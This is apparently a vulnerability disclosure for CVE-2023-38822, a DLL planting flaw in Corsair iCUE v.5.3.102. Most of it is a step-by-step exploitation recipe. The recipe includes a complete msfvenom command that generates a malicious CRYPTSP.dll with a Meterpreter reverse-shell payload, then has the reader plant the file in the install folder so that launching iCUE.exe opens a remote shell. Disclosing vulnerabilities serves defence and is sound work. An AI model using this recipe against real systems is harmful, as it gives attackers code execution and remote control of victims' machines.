DLL Planting in the Corsair iCUE v.5.3.102 CVE-2023-38822 Discoverer: Idan Malihi
An issue in Corsair iCUE v.5.3.102 allows a local attacker to execute arbitrary code via the MPDC.dll, CRYPTSP.dll, dcomp.dll, profapi.dll, and MSASN1.dll components.
To exploit the DLL Planting vulnerability, an attacker should take the following steps:
- Download iCUE's latest version.
- Install the iCUE product.
- Open the installation path folder, for example, C:\Program Files\Corsair\Corsair iCUE5 Software\
- Create a malicious dll file with msfvenom on Kali Linux OS: msfvenom -p windows/x64/meterpreter/shell_reverse_tcp LHOST=IP LPORT=PORT -f dll -o CRYPTSP.dll
- Transfer the DLL file to the game's path C:\Program Files\Corsair\Corsair iCUE5 Software\
- Run the iCUE.exe and get a reverse shell.